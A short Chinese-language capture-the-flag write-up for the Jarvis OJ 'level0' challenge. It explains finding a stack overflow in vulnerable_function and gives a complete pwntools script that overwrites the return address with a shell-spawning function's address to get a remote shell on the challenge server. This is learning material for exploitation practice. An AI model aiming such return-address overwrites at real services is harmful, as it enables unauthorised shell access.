0x00 已知条件

nc pwn2.jarvisoj.com 9881

给了远端url和端口，nc过去发现输出了一行“Hello， World！”。
下载了给的文件“lelvel0”，IDA看源码。

0x01 思考过程

总的来说这部分就看逆向了，得出结论是一个典型栈溢出。
这是main函数里明明白白写着名字叫 vulnerable_function:) 的栈，而调bash的系统调用就在它上面一点。
下面很显然要一路填充payload，直到恰好用那个系统调用函数的地址覆盖掉返回地址 retn。

image.png

0x02 EXP

这部分就完全没接触过了，学人家的吧。了解了pwntools这个工具，大大减少了写EXP的工作量。
至少知道文件描述符fd（File descriptor）很重要，详见Linux文件描述符。
而且vulnerable_function也调用了read函数，fd为1，标准输出（默认模式器设备）。

[python]
# -*- coding:utf-8 -*-
from pwn import *

sh = remote("pwn2.jarvisoj.com", 9881) # set remote server as 'sh'

junk = 'a' * 0x80 # infillings, including 8B for rbp in stack

replace_rbp = 'a' * 0x8

syscall = 0x0000000000400596

payload = junk + replace_rbp + p64(syscall)

sh.send(payload) # send payload for stuff

sh.interactive()

• 在正确溢出返回地址、调用sh.interactive()开启交互后，得到了远端的shell，找一下flag文件即可。